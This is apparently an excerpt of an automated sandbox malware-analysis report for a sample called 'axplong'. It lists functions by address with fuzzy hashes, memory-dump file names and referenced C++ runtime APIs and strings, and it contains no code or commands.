                            • Instruction ID: 11e5a9ca38b9f9b41ec4dad49d17d4f65dd4dc0231f6539160fa662ef188bc80
                            • Opcode Fuzzy Hash: 6578423f5c241e72c582e6e14e340fb18ca8ceecb2328b7973a34444ba5c53e7
                            • Instruction Fuzzy Hash: 7EB16C31224609DFD715CF28C486B65BBA0FF453A4F25866CE99ACF2A1C735E9A1CB40
                            Function 002B4AF0 Relevance: .2, Instructions: 158COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6b145cb61db71daad2c480785143f8456a64c815c873c1348c19d28cd6e0dcb4
                            • Instruction ID: 18545a4bdae47e25f7c1ab71469cacda8815f264ec54388b2b77ca8074cb3381
                            • Opcode Fuzzy Hash: 6b145cb61db71daad2c480785143f8456a64c815c873c1348c19d28cd6e0dcb4
                            • Instruction Fuzzy Hash: 4651B17061D3928FC319CF2D912563AFFE1AF95340F084A9EE0D687292D774DA58CB91
                            Function 002F777B Relevance: .1, Instructions: 104COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b69236aca418db36fa01f707a980880002a552e952bc09fdf9a656d075a39171
                            • Instruction ID: 6bb191a3cd7d875b58ca9a4ded832cfedfeecaf146d8ea8f313fbb0d8aa3131f
                            • Opcode Fuzzy Hash: b69236aca418db36fa01f707a980880002a552e952bc09fdf9a656d075a39171
                            • Instruction Fuzzy Hash: 6D21B673F204394B770CC57E8C572BDB6E1C68C641745823AE8A6EA2C1D968D917E2E4
                            Function 002F765B Relevance: .1, Instructions: 81COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dd6efc6488ce40042c1194a6ef289ad2982a858311c4c9cfa6597641f468eef5
                            • Instruction ID: cfa2993f61527981b807243ff254386e7b7a56ee8f291b8892543f8ab3ad5f8d
                            • Opcode Fuzzy Hash: dd6efc6488ce40042c1194a6ef289ad2982a858311c4c9cfa6597641f468eef5
                            • Instruction Fuzzy Hash: 2C118A23F30C295B675C817D8C172BAA5D6DBDC25071F533AD826E7384E994DE23D290
                            Function 002F8720 Relevance: .1, Instructions: 76COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                            • Instruction ID: 4f4c8a1a114bdc4c80f52a237bda1326f6f0e38566447ce6b73f7ae1977b448a
                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                            • Instruction Fuzzy Hash: C111387F22014B43D604AE2DC8F4BBBE796EAC53A1B3C437AC3414B758DA229964D900
                            Function 002E645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2fff4213254930ed00e7ed228dbaec84f54ae4095a2e15fad1c258fa6de72d8
                            • Instruction ID: 5eb10265fc2b1fa3c80d809dda812d5f0d13a51609296143dcfd94e22996ca78
                            • Opcode Fuzzy Hash: d2fff4213254930ed00e7ed228dbaec84f54ae4095a2e15fad1c258fa6de72d8
                            • Instruction Fuzzy Hash: 85E086301916886FDF35BF16C85CD483B5BEB62384F448404F81456261CB35FD91DD80
                            Function 002EA1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                            • Instruction ID: d5eb46ba91d1184ebeb8a36cbb1aba8cea0ec013de4ed668b68b9cd168eebcce
                            • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                            • Instruction Fuzzy Hash: BCE08C32965268EBCB15DBC9C904D8AF3ECEB48B10F958096F505D7240C2B0EF00CBD0
                            Function 002C7870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON
                            Download Yara Rule
                            APIs
                            • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 002C795C
                            • __Cnd_destroy_in_situ.LIBCPMT ref: 002C7968
                            • __Mtx_destroy_in_situ.LIBCPMT ref: 002C7971
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                            • String ID: 'k,d+1$@y,$d+1
                            • API String ID: 4078500453-3051532360
                            • Opcode ID: 39e1a9687afac42843b33da5a520500a726a57dbb30d106227e961d3fbcb717a
                            • Instruction ID: 564d9177f4c10fe00275d9c96e364c3afd8413a8cc636c0982d1f28c32551d51
                            • Opcode Fuzzy Hash: 39e1a9687afac42843b33da5a520500a726a57dbb30d106227e961d3fbcb717a
                            • Instruction Fuzzy Hash: AF31F2B29243059BD720DF68D846F6AB7E8EF18350F000B3EE945C3241E771EA64CBA1
                            Function 002E70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: _wcsrchr
                            • String ID: .bat$.cmd$.com$.exe
                            • API String ID: 1752292252-4019086052
                            • Opcode ID: 00ea6f69934e88b4d4b73ef1ccbd5ade06917765642a64a06869687f5d9de8ff
                            • Instruction ID: a0f1c3b04e74b5a07fdf06bbeff9341e8c002f0ee486b05a8ac16222fcfc3b16
                            • Opcode Fuzzy Hash: 00ea6f69934e88b4d4b73ef1ccbd5ade06917765642a64a06869687f5d9de8ff
                            • Instruction Fuzzy Hash: 81014E376F8397225619281BDC0267B57C89B82BB4B65002BFE48FF3C2DF44DC228690
                            Function 002B2E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Mtx_unlock$Cnd_broadcast
                            • String ID:
                            • API String ID: 32384418-0
                            • Opcode ID: 702015ae0d4fc412975a5a5784e1104345786dddd322586c1e28d397a878a1e5
                            • Instruction ID: 98bf51f0b7fab5272a1055f52d44d14fdd680e5e12288b54d03142397016b8f1
                            • Opcode Fuzzy Hash: 702015ae0d4fc412975a5a5784e1104345786dddd322586c1e28d397a878a1e5
                            • Instruction Fuzzy Hash: E9A1D1709203069FDB11EF64C945BAAB7F8FF15390F14862DE819D7641EB30EA28CB91
                            Function 002B2670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON
                            Download Yara Rule
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 002B2806
                            • ___std_exception_destroy.LIBVCRUNTIME ref: 002B28A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___std_exception_copy___std_exception_destroy
                            • String ID: P#+$P#+
                            • API String ID: 2970364248-3630811068
                            • Opcode ID: 70b2a9a9586c1e09a9de834652ffb17de91ee2705a43e96fe575469d42251518
                            • Instruction ID: 8bf694f6cca2586009ac8037497c7382080c573fdf3ccfbfe4aab7d0ff27ce79
                            • Opcode Fuzzy Hash: 70b2a9a9586c1e09a9de834652ffb17de91ee2705a43e96fe575469d42251518
                            • Instruction Fuzzy Hash: F671A071E10248DFDB05CFA8C881BDDFBB5EF49310F54822DE805A7281EB74A994CBA5
                            Function 002B2AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                            Download Yara Rule
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 002B2B23
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___std_exception_copy
                            • String ID: P#+$P#+$This function cannot be called on a default constructed task
                            • API String ID: 2659868963-3747907092
                            • Opcode ID: 5f4ae2c1d74c0765fbba671cdefa165682f7caef8a00d03882623cd15d2f7e41
                            • Instruction ID: 69373df27dba9ba99849b4e6ffd78c72d307890bafe1a761b2a981b760b98585
                            • Opcode Fuzzy Hash: 5f4ae2c1d74c0765fbba671cdefa165682f7caef8a00d03882623cd15d2f7e41
                            • Instruction Fuzzy Hash: FEF0F67092030C9BC715DF689841ADEB7EDDF05300F5042AEF84897641EB70AA648B94
                            Function 002B2440 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                            Download Yara Rule
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 002B247E
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___std_exception_copy
                            • String ID: 'k,d+1$P#+$P#+
                            • API String ID: 2659868963-3687900473
                            • Opcode ID: c96602b61fe2440ad73d7e6ef95555d1ff4944c27e44db1370079db165e3a0f0
                            • Instruction ID: ffe50b62689af6755c7638275dc8d2133fd03a81382ae70d7e8d1c0b2cfb571a
                            • Opcode Fuzzy Hash: c96602b61fe2440ad73d7e6ef95555d1ff4944c27e44db1370079db165e3a0f0
                            • Instruction Fuzzy Hash: 0CF0E5B592030C67C718EBE4DC059CAB3ECDE1A300F408A25F644EB640FBB0FA948B91
                            Function 002EC9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strrchr
                            • String ID:
                            • API String ID: 3213747228-0
                            • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                            • Instruction ID: 6f5c35f885ebf42d949694acdf36886cea26db1743e3c2a153cb1236e9fb5a26
                            • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                            • Instruction Fuzzy Hash: 60B168329602C69FDB11CFAAC851BBEBBE5EF55340F7441AAE845DB341D6348D12CB60
                            Function 002CBAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                            Download Yara Rule
